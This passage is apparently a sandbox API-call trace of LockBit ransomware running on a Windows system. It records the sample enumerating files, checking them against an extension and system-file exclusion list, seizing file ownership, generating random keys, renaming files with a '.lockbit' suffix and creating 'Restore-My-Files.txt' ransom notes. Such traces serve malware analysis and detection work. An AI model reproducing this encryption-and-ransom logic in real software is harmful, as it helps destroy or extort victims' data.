lpString2="Title_Trans_Scene_PAL.wmv") returned -1 [0083.308] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0083.308] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv") returned=".wmv" [0083.308] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.308] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.308] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.309] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.309] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv.lockbit") returned 90 [0083.309] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.310] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.310] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.310] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.310] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.311] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.311] RtlFreeAnsiString (AnsiString="\\") [0083.311] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.311] malloc (_Size=0x200) returned 0x77d800 [0083.311] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.311] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.311] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.311] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.312] CloseHandle (hObject=0x3b8) returned 1 [0083.312] free (_Block=0x77d800) [0083.312] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.312] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.312] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.312] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=661220) returned 1 [0083.312] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.313] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.313] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.313] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.318] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.318] malloc (_Size=0xca) returned 0x1ff1e60 [0083.318] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xca, FileInformationClass=0xa) returned 0x0 [0083.325] free (_Block=0x1ff1e60) [0083.325] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0083.325] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0083.325] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.325] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70079eb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70079eb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a3c, dwReserved0=0x0, dwReserved1=0x0, cFileName="userContent_16x9_imagemask.png", cAlternateFileName="")) returned 1 [0083.325] lstrcmpiW (lpString1=".", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.325] lstrcmpiW (lpString1="..", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.325] PathFindExtensionW (pszPath="userContent_16x9_imagemask.png") returned=".png" [0083.325] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0083.325] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0083.325] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0083.325] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0083.325] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0083.325] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0083.326] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0083.326] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0083.327] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0083.327] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0083.327] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] lstrcmpiW (lpString1="ntldr", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] lstrcmpiW (lpString1="bootsect.bak", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] lstrcmpiW (lpString1="autorun.inf", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] lstrcmpiW (lpString1="thumbs.db", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] lstrcmpiW (lpString1="iconcache.db", lpString2="userContent_16x9_imagemask.png") returned -1 [0083.327] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0083.327] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png") returned=".png" [0083.327] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0083.327] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0083.327] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0083.327] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0083.328] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0083.328] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0083.328] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png.lockbit") returned 95 [0083.328] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.329] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.329] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.329] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.329] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.329] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.329] RtlFreeAnsiString (AnsiString="\\") [0083.329] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.330] malloc (_Size=0x200) returned 0x77d800 [0083.330] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.330] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.330] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.330] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.330] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.330] CloseHandle (hObject=0x3b8) returned 1 [0083.331] free (_Block=0x77d800) [0083.331] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.331] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.331] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.331] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=6716) returned 1 [0083.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.332] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.332] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.336] malloc (_Size=0xd4) returned 0x1ff1e60 [0083.336] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd4, FileInformationClass=0xa) returned 0x0 [0083.338] free (_Block=0x1ff1e60) [0083.338] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0083.338] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0083.338] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.338] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ee8, dwReserved0=0x0, dwReserved1=0x0, cFileName="whitemenu.png", cAlternateFileName="")) returned 1 [0083.338] lstrcmpiW (lpString1=".", lpString2="whitemenu.png") returned -1 [0083.338] lstrcmpiW (lpString1="..", lpString2="whitemenu.png") returned -1 [0083.338] PathFindExtensionW (pszPath="whitemenu.png") returned=".png" [0083.338] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0083.338] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0083.338] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0083.339] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0083.339] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0083.340] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0083.340] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0083.340] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="whitemenu.png") returned -1 [0083.340] lstrcmpiW (lpString1="ntldr", lpString2="whitemenu.png") returned -1 [0083.340] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="whitemenu.png") returned -1 [0083.340] lstrcmpiW (lpString1="bootsect.bak", lpString2="whitemenu.png") returned -1 [0083.340] lstrcmpiW (lpString1="autorun.inf", lpString2="whitemenu.png") returned -1 [0083.340] lstrcmpiW (lpString1="thumbs.db", lpString2="whitemenu.png") returned -1 [0083.340] lstrcmpiW (lpString1="iconcache.db", lpString2="whitemenu.png") returned -1 [0083.340] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0083.340] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png") returned=".png" [0083.340] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0083.340] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0083.340] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0083.340] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0083.341] lstrcmpiW 